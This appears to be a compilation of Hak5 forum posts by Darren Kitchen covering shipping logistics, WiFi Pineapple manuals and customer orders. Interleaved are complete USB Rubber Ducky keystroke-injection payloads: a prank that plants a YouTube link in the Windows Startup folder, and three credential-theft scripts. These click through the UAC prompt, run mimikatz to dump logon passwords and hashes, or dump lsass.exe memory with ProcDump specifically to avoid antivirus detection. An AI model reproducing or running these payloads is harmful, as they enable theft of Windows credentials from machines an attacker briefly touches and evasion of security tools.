Darren Kitchen

Look if you can't figure out how to set a ststic IP address I really can't help you. And you call yourself a hacker! :-P

I'm working with a brokerage service to get all of the paperwork in line. We have a warehouse service in the UK picked out - it's just a matter of going through all the hoops. There are many. I'm in the process of getting a non-registration trade ID (meaning I'll be able to import goods without having to incorporate Hak5 in the UK as an Ltd). Once I have that I can get my electronic binding tariff information. When I get that I'll be able to register for an EORI and mail forms over to the UK government at which point I'll wait around for them to update CHIEF and once that's all done I can complete my C88 form for customs declarations and figure out our quarterly VAT tax returns... At which point I should be good to start my Shippers Export Declarations for freight with commercial invoices over 2500 USD and Bam! Then I can drop ship DDP or Delivered Duty Paid to the warehouse... What that means is we'll be paying the shipping to the UK (will be less than $40 in bulk) + the £17.40 UK VAT on your behalf, then we'll be available quick and easy throughout the euro zones. Thanks for your patience. I'll keep ya'll updated as we get closer to launch on this.

Standby for T-Shirt awesomeness.

Here's the official manual in PDF http://wifipineapple.com/mk5/booklet.pdf This is exactly what went to print so you may notice bleed.

Read over the included instruction guide. Also check out the previous booklet to familiarize yourself with pineapple fundamentals. Tune into the live stream this Wednesday (or watch it after the fact) and stay tuned for a forthcoming instructional video series. :)

It's an ODM in China whose been around for over a decade making bags for big camera companies and retailers like B&H. Contractually I'm not at liberty to say though I will point out UTG has similarly branded products. Oh the joys of international trade. Lemme tell you it's just another protocol to hack :). You'll enjoy the bag, we've gone with a top notch vendor.

Murphy's 3rd law: "Make something idiot-proof, and they will build a better idiot" ;-)

My copy pasta mistake. Should have read Mark V - Mark V (recursive much?). MK5 Karma is getting love, especially since we just leveled up this mouse! More soon. I'll be posting a PDF shortly.

Copy pasta error. Fixed now. Sorry for the confusion. Mark Vs for everyone!

Oh right, the video....

Why, what's going on tonight? Are we supposed to be doing anything specific?

I love this payload SO much! Great that it doesn't require any special privs. Here's my take using cmd instead of explorer so less delays are necessary. It's probably about the same speed but may be more reliable. REM Title: Youtube Startup Folder Roller REM Props: Morrolan DELAY 1000 GUI r DELAY 100 STRING cmd ENTER DELAY 200 STRING cd "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" ENTER STRING copy con "Google Chrome Assistant.url" ENTER STRING .url ENTER STRING [{000214A0-0000-0000-C000-000000000046}] ENTER STRING Prop3=19,2 ENTER STRING [InternetShortcut] ENTER STRING URL=http://www.youtube.com/watch_popup?v=QH2-TGUlwu4&loop=1 ENTER STRING IDList= ENTER CTRL z ENTER STRING exit ENTER Wicked fun :)

Shipping to much of Europe is now as low at $6. The package is very small. Both the standard and deluxe weigh just 2 oz or less.

USB configuration hasn't changed but I understand a lot has interface wise. Things are mostly in the same place but it looks different since 3.0. I'm working on a new booklet to cover this and anticipated the change when writing the current one so much of the fundamentals are absolutely still valid. It'll be online free of charge as soon as I have it completed. If there's something specific you're looking for feel free to ask here.

vtecone, I understand your concern but I assure you - you aren't being ripped off. Typically orders go out next business day however our fraud prevention system detected a few concerns which put your order on hold. Usually we're able to resolve them in a timely manner however this particular order took a couple days longer than normal. I apologize for the inconvenience, I know the feeling of waiting on an order. Unfortunately in our business we have to scrutinize every order and when things don't match it's cause for concern. We reject a very high level of fraudulent orders which sadly delays a legitimate order every now and then. Once we've validated the credit card address and zip code that aren't matching we'll get your order out ASAP. I'm happy to upgrade the ground shipping to next day air in addition to my sincere apology. Feel free to reach out to me directly - darren@hak5.org. Regards, Darren

Some helpful comments from YouTube regarding this script:

Comment from Youtube on the latest episode featuring the payload suggests OS / CPU detection. The same could be done with ver to figure out if it's NT5 or NT6 and run the appropriate version of mimikatz. Any takers?

See you there!

Here's an updated version using a recommendation from Mubix that should speed it up ever so slightly. REM Author: Hak5Darren. Props: shutin, DyFukA, Mubix REM Description: Dump local wdigest passwords from memory using mimikatz REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt REM Target: Windows 7 x64 (target win32 with 32-bit binary) REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute mimikatz from SD card and save log file to disk *** STRING %duck%\mimikatz_alpha_x64.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt ENTER REM *** GTFO *** STRING exit ENTER STRING exit ENTER

We aim to please dude. Enjoy the technosaurus. It always amuses me what ends up in that "Special Request" box. We've sent some weird stuff man... Sara, who runs the HakShop, has become quite the artist. Wish I had a pic of the wizard she sent a few weeks ago.

Think of how much fun that would be if it could be controlled over WWAN.

Wouldn't this be the MK7? 4+3? ;-)

It's not bringing up "Wireless Network Connection 2" and "Wireless Network Connection 3" most likely because they do not exist. In testing my target machine had 3 wireless adapters so I'd bring them all up. Most PCs will only have 1 labeled "Wireless Network Connection" (btw this is why I prefer Linux's wlan0, wlan1, wlan2, etc...)

Here's a version of the Mimikatz password recovery payload that doesn't set off AV. See here for background: https://forums.hak5.org/index.php?/topic/29657-payload-ducky-script-using-mimikatz-to-dump-passwords-from-memory/ This uses the Twin Duck firmware and makes use of the Microsoft Sysinternals utility ProcDump.exe. While slower, the advantage here is that ProcDump.exe doesn't alarm anti-virus. Props to @mubix - I based this on his blog post http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html I started a new thread because I'm curious if anyone has ideas on how this could be sped up. With the slow transfer speed of the twin duck and the large'ish filesize of the .dmp (42 MB on my system) would it be possible to save it locally then "grep" the important (smaller?) bits out before transferring them over. REM Author: Hak5Darren with the help of: REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals REM REM Description: "Backup" Windows Passwords without setting off AntiVirus REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump REM Passwords can be later be extracted using mimikatz. REM REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from: REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx REM REM Target: Windows Vista/7/8, Win32/x64 REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute procdump from SD card and save log file to disk *** STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp ENTER REM *** GTFO *** STRING exit ENTER REM *** Post Exploitation *** REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a REM directory including the version of mimikatz for your targets architecture REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands REM mimikatz.exe <enter> REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter> REM sekurlsa::logonPasswords full <enter> I'm also curious if a powershell version could be created using this: https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

Fantastic contribution. Here's a version I whipped up that uses c_duck_v2.1 firmware (Twin Duck) to execute mimikatz from the DUCKY SD card and save the password log file to disk, REM Author: Hak5Darren based on code from redmeatuk, shutin, DyFukA REM Description: Dump local wdigest passwords from memory using mimikatz REM Note: Uses c_duck_v2.1 firmware (Twin Duck) to execute mikikatz from REM SD card labeled "DUCKY" and save log file as %computername%-passwords.txt REM Target: Windows 7 x64 (target win32 with 32-bit binary) REM *** UAC Bypass *** DELAY 2000 WINDOWS r DELAY 200 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 2000 ALT y DELAY 500 REM *** Define DUCKY drive as %duck% STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d ENTER DELAY 500 REM *** Execute mimikatz from SD card and save log file to disk *** STRING %duck%\mimikatz_alpha_x64.exe > %duck%\%computername%-passwords.txt ENTER DELAY 100 STRING privilege::debug ENTER STRING sekurlsa::logonPasswords full ENTER REM *** GTFO *** STRING exit ENTER STRING exit ENTER